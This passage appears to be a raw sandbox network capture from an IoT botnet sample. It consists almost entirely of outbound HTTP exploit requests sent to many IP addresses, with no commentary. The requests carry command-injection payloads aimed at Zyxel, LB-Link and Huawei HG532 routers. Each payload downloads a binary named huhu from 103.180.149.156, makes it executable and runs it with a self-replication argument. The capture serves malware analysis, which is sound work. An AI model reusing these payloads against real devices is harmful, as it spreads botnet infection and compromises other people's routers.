                                                      Feb 2, 2024 06:36:11.032541990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8951192.168.2.144153238.78.205.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.032582998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8952192.168.2.144580468.124.95.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.032618999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8953192.168.2.1440680179.114.36.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.032660961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8954192.168.2.143680870.29.219.1008080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.749289036 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                      Cookie: user=admin
                                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                      Feb 2, 2024 06:36:11.889113903 CET289INHTTP/1.1 404 Not Found
                                                      CONNECTION: close
                                                      CONTENT-LENGTH: 48
                                                      X-XSS-Protection: 1;mode=block
                                                      Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'
                                                      X-Content-Type-Options: nosniff
                                                      CONTENT-TYPE: text/html
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><body><h1>404 Not Found</h1></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8955192.168.2.145051083.66.248.38080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.853694916 CET225OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                      Cookie: user=admin
                                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8956192.168.2.146001434.117.61.18337215
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.008557081 CET841OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept: */*
                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                      Content-Length: 472
                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 68 75 68 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.180.149.156 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8957192.168.2.1459920211.213.41.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.045566082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8958192.168.2.145752262.197.174.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.045614004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8959192.168.2.1438722114.22.86.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.045646906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8960192.168.2.143545413.69.210.77443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.045695066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8961192.168.2.1433776139.23.1.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.045722961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8962192.168.2.143412261.226.122.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.045762062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8963192.168.2.144864240.17.156.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.045809984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8964192.168.2.144556027.73.145.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.045851946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8965192.168.2.1442440218.238.187.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.045892000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8966192.168.2.145065882.253.166.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.045908928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8967192.168.2.143931685.161.176.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.045974016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8968192.168.2.1438054115.32.70.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.046015024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8969192.168.2.145690657.85.71.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.046066046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8970192.168.2.144817880.213.80.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.046113014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8971192.168.2.144739262.183.184.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.046153069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8972192.168.2.1444000131.224.164.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.046180964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8973192.168.2.145135890.21.194.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.046211958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8974192.168.2.1459022118.211.101.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.046230078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8975192.168.2.1446104179.212.23.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.046267033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8976192.168.2.1455384172.73.24.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.046294928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8977192.168.2.144503480.40.85.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.046339035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8978192.168.2.1457914164.59.104.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.046369076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8979192.168.2.143824627.180.220.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.046401978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8980192.168.2.1438396165.193.54.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.046441078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8981192.168.2.1445894158.94.68.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.046482086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8982192.168.2.1455392144.177.22.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.046520948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8983192.168.2.144656814.204.65.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.046567917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8984192.168.2.145732446.102.98.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.046602964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8985192.168.2.145956483.23.159.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.046638966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8986192.168.2.145263623.133.129.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.046694994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8987192.168.2.1457692210.123.232.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.046717882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8988192.168.2.1435300168.49.9.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.046751022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8989192.168.2.143365080.56.31.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.046792030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8990192.168.2.145037249.118.94.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.046840906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8991192.168.2.1448030130.220.193.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.046890020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8992192.168.2.144792064.60.154.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.046922922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8993192.168.2.1446746130.34.122.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.046948910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8994192.168.2.144400085.165.233.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.046987057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8995192.168.2.1435992219.120.79.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.047029018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8996192.168.2.1451466128.131.249.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.047077894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8997192.168.2.144711879.167.229.88443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.047106028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8998192.168.2.1449988115.46.205.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.047171116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8999192.168.2.143298085.100.115.168443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.047218084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9000192.168.2.143818623.32.17.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.047251940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9001192.168.2.1432842146.49.127.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.047293901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9002192.168.2.1451064101.67.5.148443
